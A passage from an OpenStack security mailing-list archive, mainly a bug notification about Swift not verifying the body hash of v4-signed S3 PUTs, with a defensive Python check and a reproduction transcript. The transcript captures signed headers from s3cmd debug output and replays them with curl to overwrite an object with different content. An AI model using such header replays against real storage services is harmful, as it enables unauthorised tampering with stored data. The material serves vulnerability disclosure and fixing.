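      _tokens[token] = (instance_id, time.time() + TOKEN_TTL)
      return token

  def validate_console_token(token):
      """Return the instance id if the token is valid, else None.

      The token is consumed on first use, so a captured URL cannot
      be replayed from another machine."""
      entry = _tokens.pop(token, None)  # single use
      if entry is None:
          return None
      instance_id, expires_at = entry
      if time.time() > expires_at:
          return None
      return instance_id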
  To manage notifications about this bug go to:
  https://bugs.launchpad.net/nova/+bug/1447679/+subscriptions

From 1765834 at bugs.launchpad.net Tue Nov 26 14:28:23 2019
From: 1765834 at bugs.launchpad.net (OpenStack Infra)
Date: Tue, 26 Nov 2019 14:28:23 -0000
Subject: [Openstack-security] [Bug 1765834] Fix included in openstack/swift 2.19.2
References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com>
Message-ID: <157477850344.31668.12956333870865397306.malone@wampee.canonical.com>

This issue was fixed in the openstack/swift 2.19.2 release.

-- 
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1765834

Title:
  Need to verify content of v4-signed PUTs

Status in OpenStack Security Advisory: Won't Fix
Status in OpenStack Object Storage (swift): Fix Released
Status in Swift3: New

Bug description:
  When we added support for v4 signatures, we (correctly) require that
  the client provide an X-Amz-Content-SHA256 header and use it in
  computing the expected signature. However, we never verify that the
  content sent actually matches the SHA! As a result, an attacker that
  manages to capture the headers for a PUT request has a 5-minute
  window to overwrite the object with arbitrary content of the same
  length. (A reproduction transcript follows the sketch below.)
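  The missing check is conceptually small: hash the received body and
  compare it against the signed header before accepting the PUT. A
  minimal Python sketch, not the fix attached to this bug
  (verify_v4_payload is a hypothetical name; body is assumed to be the
  fully read request body as bytes):

  import hashlib

  def verify_v4_payload(body, declared_sha256):
      """Reject a request whose body does not hash to the
      X-Amz-Content-SHA256 value that was covered by the signature.

      'UNSIGNED-PAYLOAD' is the S3 escape hatch for clients that
      choose not to bind the body to the signature.
      """
      if declared_sha256 == 'UNSIGNED-PAYLOAD':
          return True
      return hashlib.sha256(body).hexdigest() == declared_sha256

  With such a check, replaying captured headers with a different body
  fails, because the body no longer hashes to the signed
  X-Amz-Content-SHA256 value.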
  [11:50:08] $ echo 'GOOD' > good.txt
  [11:50:12] $ echo 'BAD!' > bad.txt
  [11:50:36] $ s3cmd put --debug good.txt s3://bucket
  DEBUG: s3cmd version 1.6.1
  DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg'
  DEBUG: ConfigParser: access_key->te...8_chars...r
  DEBUG: ConfigParser: secret_key->te...4_chars...g
  DEBUG: ConfigParser: host_base->saio:8080
  DEBUG: ConfigParser: host_bucket->saio:8080
  DEBUG: ConfigParser: use_https->False
  DEBUG: Updating Config.Config cache_file ->
  DEBUG: Updating Config.Config follow_symlinks -> False
  DEBUG: Updating Config.Config verbosity -> 10
  DEBUG: Unicodising 'put' using UTF-8
  DEBUG: Unicodising 'good.txt' using UTF-8
  DEBUG: Unicodising 's3://bucket' using UTF-8
  DEBUG: Command: put
  DEBUG: DeUnicodising u'good.txt' using UTF-8
  INFO: Compiling list of local files...
  DEBUG: DeUnicodising u'good.txt' using UTF-8
  DEBUG: DeUnicodising u'good.txt' using UTF-8
  DEBUG: Unicodising '' using UTF-8
  DEBUG: DeUnicodising u'good.txt' using UTF-8
  DEBUG: DeUnicodising u'good.txt' using UTF-8
  DEBUG: Applying --exclude/--include
  DEBUG: CHECK: good.txt
  DEBUG: PASS: u'good.txt'
  INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time...
  DEBUG: DeUnicodising u'good.txt' using UTF-8
  DEBUG: doing file I/O to read md5 of good.txt
  DEBUG: DeUnicodising u'good.txt' using UTF-8
  INFO: Summary: 1 local files to upload
  DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'}
  DEBUG: DeUnicodising u'good.txt' using UTF-8
  DEBUG: DeUnicodising u'good.txt' using UTF-8
  DEBUG: DeUnicodising u'good.txt' using UTF-8
  DEBUG: String 'good.txt' encoded to 'good.txt'
  DEBUG: CreateRequest: resource[uri]=/good.txt
  DEBUG: Using signature v4
  DEBUG: get_hostname(bucket): saio:8080
  DEBUG: canonical_headers = content-length:5
  content-type:text/plain
  host:saio:8080
  x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  x-amz-date:20180420T185102Z
  x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212
  x-amz-storage-class:STANDARD

  DEBUG: Canonical Request:
  PUT
  /bucket/good.txt

  content-length:5
  content-type:text/plain
  host:saio:8080
  x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  x-amz-date:20180420T185102Z
  x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212
  x-amz-storage-class:STANDARD

  content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class
  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  ----------------------
  DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'}
  DEBUG: Unicodising 'good.txt' using UTF-8
  upload: 'good.txt' -> 's3://bucket/good.txt'  [1 of 1]
  DEBUG: DeUnicodising u'good.txt' using UTF-8
  DEBUG: Using signature v4
  DEBUG: get_hostname(bucket): saio:8080
  DEBUG: canonical_headers = content-length:5
  content-type:text/plain
  host:saio:8080
  x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7
  x-amz-date:20180420T185102Z
  x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212
  x-amz-storage-class:STANDARD

  DEBUG: Canonical Request:
  PUT
  /bucket/good.txt

  content-length:5
  content-type:text/plain
  host:saio:8080
  x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7
  x-amz-date:20180420T185102Z
  x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212
  x-amz-storage-class:STANDARD

  content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class
  d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7
  ----------------------
  DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'}
  DEBUG: get_hostname(bucket): saio:8080
  DEBUG: ConnMan.get(): creating new connection: http://saio:8080
  DEBUG: non-proxied HTTPConnection(saio:8080)
  DEBUG: format_uri(): /bucket/good.txt
   5 of 5   100% in    0s   373.44 B/s
  DEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1)
  DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}
   5 of 5   100% in    0s    56.02 B/s  done
  DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a"
  /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up
    CleanupWarning)
  [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt \
      -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' \
      -H 'x-amz-storage-class: STANDARD' \
      -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' \
      -H 'x-amz-date: 20180420T185102Z' \
      -H 'content-type: text/plain' \
      -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'
  *   Trying 192.168.8.80...
  * TCP_NODELAY set
  * Connected to saio (192.168.8.80) port 8080 (#0)
  > PUT /bucket/good.txt HTTP/1.1
  > Host: saio:8080
  > User-Agent: curl/7.54.0
  > Accept: application/json;q=1, text/*;q=.9, */*;q=.8
  > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7
  > x-amz-storage-class: STANDARD
  > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212
  > x-amz-date: 20180420T185102Z
  > content-type: text/plain
  > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b
  > Content-Length: 5
  > Expect: 100-continue
  >
  < HTTP/1.1 100 Continue
  * We are completely uploaded and fine
  < HTTP/1.1 200 OK
  < Content-Length: 0
  < x-amz-id-2: tx348d466b04cd425b81760-005ada3718
  < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT
  < ETag: "6cd890020ad6ab38782de144aa831f24"
  < x-amz-request-id: tx348d466b04cd425b81760-005ada3718
  < Content-Type: text/html; charset=UTF-8
  < X-Trans-Id: tx348d466b04cd425b81760-005ada3718
  < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718
  < Date: Fri, 20 Apr 2018 18:53:13 GMT
  <
  * Connection #0 to host saio left intact

  ---

  I've attached a fix, but it could use tests :-/

  To manage notifications about this bug go to:
  https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions